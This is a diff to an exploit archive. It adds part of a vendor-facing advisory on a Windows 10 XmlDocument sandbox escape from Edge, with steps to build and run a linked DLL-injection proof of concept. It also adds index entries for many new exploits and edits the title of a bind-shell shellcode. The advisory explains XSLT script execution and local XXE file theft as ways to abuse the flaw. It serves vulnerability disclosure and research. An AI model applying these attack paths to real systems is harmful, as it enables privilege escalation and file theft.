+Looking at the class it’s implemented inside msxml6.dll and is basically a MSXML.DOMDocument.6.0 class in all but name. Checking what interfaces the class supports you find the following (partial list):
+
+IPersistMoniker
+IPersistStream
+IPersistStreamInit
+IServiceProvider
+IStream
+IXMLDOMDocument
+IXMLDOMDocument2
+IXMLDOMDocument3
+IXMLDOMNode
+Windows::Xml::Dom::IXmlDocument
+Windows::Xml::Dom::IXmlDocumentIO
+Windows::Xml::Dom::IXmlDocumentIO2
+Windows::Xml::Dom::IXmlNode
+Windows::Xml::Dom::IXmlNodeSelector
+Windows::Xml::Dom::IXmlNodeSerializer
+
+What sticks out is it supports IXMLDOMDocument* which is the normal MSXML interfaces. Even if the underlying implementation was based on the existing MSXML DOM Document I’d have expected that creating this object as a runtime object would wrap the MSXML object and only expose those interfaces needed for its use as a runtime object. However, it exposes everything. 
+
+Potential issues with this are:
+IPersistMoniker could be used to save to a file with normal user privileges.
+IXMLDOMDocument supports a save method which can do the same thing.
+You can access the transformNode method to execute an XSLT template including arbitrary WSH script code (this is the _really_ bad one).
+
+So the easiest way to escape the sandbox would be to execute the XSLT script. As the script is running in the Runtime Broker it runs with full user privileges and so can trivially escape the sandbox including the Edge Content LPAC sandbox.
+
+The other classes which expose an XmlDocument:
+
+ToastNotification via the get_Content method.
+BadgeUpdateManager via the GetTemplateContent method.
+TileFlyoutUpdateManager again via GetTemplateContent.
+TileUpdateManager...
+
+You can work out the rest, I’ve got better things to do.
+
+Note that I think even if you remove all non-runtime interfaces exposed from XmlDocument just the built in functionality might be dangerous. For example you can call XmlDocument::loadXML with the ResolveExternals load setting which would likely allow you to steal files from the local system (a local XXE attack basically). Also I’m not entirely convinced that SaveToFileAsync is 100% safe when used OOP. It just calls StorageFile::OpenAsync method, in theory if you could get a StorageFile object for a file you can’t write to, if there’s normally a check in OpenAsync then that could result it an arbitrary file being overwritten.
+
+Fixing wise at the least I’d wrap XmlDocument better so that it only exposes runtime interfaces. In the general case I’d also consider exposing XmlDocument over a process boundary to be dangerous so you might want to try and do something about that. And alternative would be to implement IMarshal on the object to custom marshal the XML document across the process boundary so that any calls would only affect the local process, but that’d almost certainly introduce perf regressions as well as appcompat issues. But that’s not my problem.
+
+Proof of Concept:
+
+I’ve provided a PoC as a solution containing the C# PoC as well as a DLL which can be injected into Edge to demonstrate the issue. The PoC will inject the DLL into a running MicrosoftEdgeCP process and run the attack. Note that the PoC needs to know the relative location of the ntdll!LdrpKnownDllDirectoryHandle symbol for x64 in order to work. It should be set up for the initial release of RS5 (17763.1) but if you need to run it on another machine you’ll need to modify GetHandleAddress in the PoC to check the version string from NTDLL and return the appropriate location (you can get the offset in WinDBG using ‘? ntdll!LdrpKnownDllDirectoryHandle-ntdll). Also before you ask, the injection isn’t a CIG bypass you need to be able to create an image section from an arbitrary file to perform the injection which you can do inside a process running with CIG.
+
+1) Compile the solution in “Release” mode for “Any CPU”. It’ll need to pull NtApiDotNet from NuGet to build.
+2) Start a copy of Edge (ensure it’s not suspended).
+3) Execute the PoC from the x64\Release directory.
+
+Expected Result:
+Accessing the XmlDocument provides no elevated privileges.
+
+Observed Result:
+Notepad executes outside the sandbox.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46185.zip
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6250,6 +6250,14 @@ id,file,description,date,author,type,platform,port
 46129,exploits/windows/dos/46129.py,"Blob Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
 46130,exploits/windows/dos/46130.py,"Luminance Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
 46165,exploits/android/dos/46165.txt,"1Password < 7.0 - Denial of Service",2019-01-15,"Valerio Brussani",dos,android,
+46170,exploits/windows/dos/46170.py,"Spotify 1.0.96.181 - 'Proxy configuration' Denial of Service (PoC)",2019-01-16,"Aaron V. Hernandez",dos,windows,
+46175,exploits/linux/dos/46175.py,"NTPsec 1.1.2 - 'ctl_getitem' Out-of-Bounds Read (PoC)",2019-01-16,"Magnus Klaaborg Stubman",dos,linux,123
+46176,exploits/linux/dos/46176.py,"NTPsec 1.1.2 - 'ntp_control' Out-of-Bounds Read (PoC)",2019-01-16,"Magnus Klaaborg Stubman",dos,linux,123
+46177,exploits/linux/dos/46177.py,"NTPsec 1.1.2 - 'ntp_control' Authenticated NULL Pointer Dereference (PoC)",2019-01-16,"Magnus Klaaborg Stubman",dos,linux,123
+46178,exploits/linux/dos/46178.py,"NTPsec 1.1.2 - 'config' Authenticated Out-of-Bounds Write Denial of Service (PoC)",2019-01-16,"Magnus Klaaborg Stubman",dos,linux,123
+46181,exploits/multiple/dos/46181.html,"Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length",2019-01-16,"Bogdan Kurinnoy",dos,multiple,
+46183,exploits/multiple/dos/46183.js,"WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free",2019-01-16,"Google Security Research",dos,multiple,
+46184,exploits/windows/dos/46184.txt,"Microsoft Windows 10 - 'RestrictedErrorInfo' Unmarshal Section Handle Use-After-Free",2019-01-16,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10215,6 +10223,8 @@ id,file,description,date,author,type,platform,port
 46161,exploits/windows/local/46161.txt,"Microsoft Windows 10 - Browser Broker Cross Session Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46162,exploits/windows/local/46162.txt,"Microsoft Windows 10 - COM Desktop Broker Privilege Escalation",2019-01-14,"Google Security Research",local,windows,
 46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows,
+46185,exploits/windows/local/46185.txt,"Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation",2019-01-16,"Google Security Research",local,windows,
+46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -40647,3 +40657,10 @@ id,file,description,date,author,type,platform,port
 46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows,
 46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi,
 46168,exploits/php/webapps/46168.txt,"ownDMS 4.7 - SQL Injection",2019-01-15,"Ihsan Sencan",webapps,php,80
+46171,exploits/hardware/webapps/46171.py,"FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443
+46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
+46173,exploits/php/webapps/46173.txt,"doorGets CMS 7.0 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80
+46174,exploits/php/webapps/46174.txt,"ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution",2019-01-16,twosevenzero,webapps,php,80
+46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80
+46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80
+46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80
--- a/shellcodes/linux_x86/46166.c
+++ b/shellcodes/linux_x86/46166.c
@ -1,5 +1,5 @@
 /*
-; Title		: Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)
+; Title		: Linux/x86 - Bind (4444/TCP) Shell (/bin/bash) Shellcode (100 bytes)
 ; Date		: Jan, 2019
 ; Author	: Joao Batista
 ; Website	: overflw.wordpress.com